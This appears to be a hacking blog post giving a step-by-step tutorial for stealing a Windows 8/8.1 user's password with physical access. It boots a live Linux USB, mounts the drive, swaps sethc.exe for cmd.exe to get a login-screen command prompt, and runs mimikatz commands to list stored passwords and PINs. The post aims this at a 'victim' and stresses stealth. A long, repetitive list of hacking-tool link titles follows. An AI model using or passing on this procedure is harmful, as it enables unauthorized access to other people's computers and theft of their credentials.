You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...
Requirements:
- A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
- Mimikatz (Download | Blog)
- Physical Access to victim's machine
- A Working Brain in that Big Head (Download Here)
Steps:
1. First of all download mimikatz and put it in a pendrive.2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window
3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:
mkdir /media/win
ntfs-3g /dev/sda1 /media/win
[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.
4. Now navigate to the System32 folder using the following command
cd /media/win/Windows/System32
5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:
mv sethc.exe sethc.exe.bak
sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.
6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:
cp cmd.exe sethc.exe
[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality
7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.
8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this
9. Now navigate to your usb drive in my case its drive G:
10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)
11. Run mimikatz and type the following commands one after the other in sequence:
privilege::debug
token::elevate
vault::list
the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)
That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...
Hope you enjoyed the tutorial have fun :)
Related posts
- Ethical Hacker Tools
- Best Hacking Tools 2019
- Hacker Tools Free
- Termux Hacking Tools 2019
- Hack Tools
- Pentest Tools Find Subdomains
- Hacking Tools For Pc
- Hacker Tools 2020
- Pentest Tools Website Vulnerability
- Nsa Hack Tools Download
- Hacker Tools Github
- World No 1 Hacker Software
- Pentest Tools For Ubuntu
- Hacker Tools Hardware
- Pentest Tools Find Subdomains
- Hacker Tools Github
- Hack Tools
- Hack App
- Hacker Hardware Tools
- Hacker Tools For Mac
- Hackers Toolbox
- Best Pentesting Tools 2018
- Hacker Tools For Windows
- Hacking Tools Windows
- Pentest Reporting Tools
- Pentest Tools For Mac
- Hack Rom Tools
- How To Hack
- What Are Hacking Tools
- Blackhat Hacker Tools
- Hack Tools Download
- Hacking Tools For Kali Linux
- Hacking Tools 2019
- Hacker Tools 2020
- Physical Pentest Tools
- Pentest Tools Website
- Pentest Tools Free
- Hacker Tools
- Hack Tools Github
- Pentest Tools Website
- Nsa Hack Tools
- Hack Tools For Mac
- Hacker Hardware Tools
- Hack Tools For Games
- Pentest Tools Nmap
- Hacking Tools For Pc
- Physical Pentest Tools
- Tools For Hacker
- Hacking Tools For Beginners
- Hacker Tools Linux
- Hack Tools Download
- Hacking Tools And Software
- Pentest Tools For Mac
- World No 1 Hacker Software
- Top Pentest Tools
- Physical Pentest Tools
- Hacker Tools For Mac
- Android Hack Tools Github
- Hacker Tools Free Download
- Pentest Automation Tools
- Hacker Tools Free
- Nsa Hacker Tools
- Hacking Tools Download
- Computer Hacker
- Hacker Tools Apk Download
- Nsa Hack Tools Download
- Hacker Hardware Tools
- Pentest Tools Nmap
- Hacker Tools Free
- Hack Tools For Windows
- Hacking Tools Hardware
- Physical Pentest Tools
- Pentest Tools Github
- Hacking Tools Windows
- Pentest Tools For Mac
- Pentest Tools List
- Hacking Tools Software
- Hacking Tools Name
- Tools 4 Hack
- Pentest Tools List
- Hacking Apps
- Wifi Hacker Tools For Windows
- Pentest Tools Port Scanner
- Pentest Tools Review
- World No 1 Hacker Software
- Hacking Tools Windows 10
- Hacking Tools Name
- Pentest Tools Subdomain
- Hacking Tools Hardware
- Hack Tool Apk No Root
- Pentest Box Tools Download
- Hack Tools Mac
- New Hacker Tools
- Pentest Tools Port Scanner
- Termux Hacking Tools 2019
- Pentest Tools Url Fuzzer
- Hacker Tools Software
- Hacking Tools For Kali Linux
- What Are Hacking Tools
- Hack Tools Pc
- Hacking Tools Mac
- Blackhat Hacker Tools
- Pentest Tools Find Subdomains
- Tools For Hacker
- Hacking Tools For Pc
- Pentest Tools Apk
- Pentest Tools List
- Github Hacking Tools
- Hack Tools Download
- Best Hacking Tools 2019
- Hacker Tool Kit
- Pentest Tools
- Hacking Tools For Beginners
- Hacking Apps
- Pentest Recon Tools
- Hacker Search Tools
- Hacking Tools Software
- Pentest Tools For Ubuntu
- Best Hacking Tools 2019
- Physical Pentest Tools
- Best Hacking Tools 2020
- Hak5 Tools
- Pentest Tools Kali Linux
- Hacker Tools Github
- Hack Tools Github
- Hacking Apps
- Game Hacking
- Hack Tools For Windows
- Hack Apps
- Physical Pentest Tools
- Hacking Tools Download
- Hacker Tools Apk Download
- Easy Hack Tools
- Kik Hack Tools
- Bluetooth Hacking Tools Kali
- Install Pentest Tools Ubuntu
- Hacker Tools For Windows
- Hacker Tools Apk
- Hacker Security Tools
- Pentest Box Tools Download
- Pentest Tools Port Scanner
- Install Pentest Tools Ubuntu
- Ethical Hacker Tools
- World No 1 Hacker Software
- Pentest Tools Linux
- Hacker Tools Software
- Nsa Hack Tools
- Pentest Tools Free
- Hacking Tools Usb
- Game Hacking
- Hack Apps
No comments:
Post a Comment